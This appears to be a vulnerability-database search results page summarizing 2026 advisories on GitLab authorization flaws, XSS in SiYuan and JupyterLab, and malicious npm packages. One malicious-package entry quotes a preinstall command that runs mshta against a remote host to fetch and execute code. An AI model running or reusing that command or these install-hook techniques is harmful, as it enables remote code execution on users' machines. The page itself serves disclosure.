Lucene search
K

2274 matches found

OSV
OSV
added 2026/06/29 6:2 a.m.4 views

BIT-GITLAB-2026-5796 Incorrect Authorization in GitLab

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with Reporter-level group permissions to view package metadata from projects with the...

4.3CVSS5.8AI score0.00193EPSS
Exploits0References4
NVD
NVD
added 2026/06/25 5:16 a.m.8 views

CVE-2026-5952

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 17.11 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with developer-role permissions to bypass package protection rules and overwrite...

4.3CVSS0.00195EPSS
Exploits0References3
CVE
CVE
added 2026/06/25 4:34 a.m.101 views

CVE-2026-5796

GitLab CE/EE contains a fixed vulnerability (CVE-2026-5796) that could allow an authenticated user with Reporter-level group permissions to view package metadata from projects when the Package Registry is disabled. Affected versions include all 13.6.x prior to 18.11.6, 19.0.x prior to 19.0.3, and...

4.3CVSS5.9AI score0.00193EPSS
Exploits0References3Affected Software1
ATTACKERKB
ATTACKERKB
added 2026/06/25 4:34 a.m.80 views

CVE-2026-5796

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with Reporter-level group permissions to view package metadata from projects with the...

4.3CVSS5.9AI score0.00193EPSS
Exploits0References4Affected Software1
Cvelist
Cvelist
added 2026/06/25 4:34 a.m.37 views

CVE-2026-5796 Incorrect Authorization in GitLab

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an authenticated user with Reporter-level group permissions to view package metadata from projects with the...

4.3CVSS0.00193EPSS
Exploits0References3
Tenable Nessus
Tenable Nessus
added 2026/06/25 12:0 a.m.9 views

GitLab 13.6 < 18.11.6 / 19.0 < 19.0.3 / 19.1 < 19.1.1 (CVE-2026-5796)

The version of GitLab installed on the remote host is affected by a vulnerability, as follows: - GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.6 before 18.11.6, 19.0 before 19.0.3, and 19.1 before 19.1.1 that under certain conditions could have allowed an...

4.3CVSS5.9AI score0.00193EPSS
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 8:18 p.m.7 views

Malicious code in triage-bot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ef2bb10931626a345e1277463f9c2ec6ca36108c2d6131c9210707ea5692a64 package.json declares preinstall: node index.js, so the payload runs automatically on npm install with no user action. index.js requires os, fs, and...

5.9AI score
Exploits0References2
NVD
NVD
added 2026/06/21 2:16 p.m.12 views

CVE-2026-56395

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

9.6CVSS0.00391EPSS
Exploits0References2
ATTACKERKB
ATTACKERKB
added 2026/06/21 1:27 p.m.7 views

CVE-2026-56397

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

9.6CVSS6.7AI score0.00391EPSS
Exploits0References3
CVE
CVE
added 2026/06/21 1:27 p.m.31 views

CVE-2026-56397

CVE-2026-56397 affects SiYuan prior to v3.6.1 where Bazaar marketplace metadata and README aren’t sanitized, allowing malicious authors to inject HTML/JavaScript. This can enable remote code execution on users browsing Bazaar by embedding XSS payloads in displayName, description, or README, takin...

9.6CVSS6.7AI score0.00391EPSS
Exploits0References2
ATTACKERKB
ATTACKERKB
added 2026/06/21 1:27 p.m.6 views

CVE-2026-56395

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

9.6CVSS6.7AI score0.00391EPSS
Exploits0References3
Cvelist
Cvelist
added 2026/06/21 1:27 p.m.35 views

CVE-2026-56395 SiYuan - Remote Code Execution via Malicious Bazaar Package Metadata and README

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

9.6CVSS0.00391EPSS
Exploits0References2
CVE
CVE
added 2026/06/21 1:27 p.m.29 views

CVE-2026-56395

SiYuan exposes a vulnerability (CVE-2026-56395) where SieYuan versions prior to 3.6.1 fail to sanitize Bazaar marketplace metadata and README content, enabling arbitrary HTML/JavaScript injection. The underlying issue is improper sanitization of package displayName, description, or README fields,...

9.6CVSS6.7AI score0.00391EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2026/06/21 12:0 a.m.24 views

PT-2026-51236

Name of the Vulnerable Software and Affected Versions SiYuan versions prior to 3.6.1 Description SiYuan fails to sanitize package metadata and README content within the Bazaar marketplace. This allows malicious authors to inject arbitrary HTML and JavaScript into the displayName, description, or...

9.6CVSS6.7AI score0.00391EPSS
Exploits0References7
OSV
OSV
added 2026/06/19 3:11 p.m.19 views

GHSA-VMHF-C436-HXJ4 JupyterLab: Stored XSS in extension manager through package metadata unsanitized URI protocol

A malicious PyPI package can place a javascript: URL in its project.urls metadata. JupyterLab's Extension Manager renders this as the extension's home-page link without validating the protocol, so a user who clicks the extension name executes attacker-controlled JavaScript in the JupyterLab origi...

5.1CVSS5.9AI score
Exploits0References5
OSV
OSV
added 2026/06/16 4:1 p.m.8 views

MAL-2026-5895 Malicious code in easyllmai (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2f3b4523b083331b34769a2a730586fa622f50560f2f237a893633e7ffb57872 On npm install, the package's preinstall lifecycle hook "preinstall": "node preinstall.js" unconditionally runs exec'cmd /c "mshta http://fixars.top"...

6.4AI score
Exploits0References2
OSV
OSV
added 2026/06/09 4:6 p.m.10 views

MAL-2026-5393 Malicious code in @sflyinc-knapsack/shutterfly-react (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1b554d911cfb6d444727262a62e2db10f22a75d53d23741d6c2684f62fb6e5d On require/load, index.js collects host identifiers os.hostname, os.userInfo, os.homedir, DNS server configuration, package.json metadata, and dirnam...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 4:6 p.m.16 views

Malicious code in @sflyinc-knapsack/shutterfly-react (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1b554d911cfb6d444727262a62e2db10f22a75d53d23741d6c2684f62fb6e5d On require/load, index.js collects host identifiers os.hostname, os.userInfo, os.homedir, DNS server configuration, package.json metadata, and dirnam...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/22 6:9 a.m.13 views

Malicious code in @druids/ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 071ce35c0d6a17c606e5448f4c485228df973342935b0a11519304050877edf5 The package's package.json declares a dependency ltidisafe resolved not from the npm registry but as a direct tarball URL:...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/21 8:42 p.m.13 views

Malicious code in configcat-trello-powerup (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5365489bc7a763096bf4be47f80bd47e4513917d8b37ba2754e33ae11983872b package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js collects host identifiers os.hostname,...

5.8AI score
Exploits0References1
Rows per page
Query Builder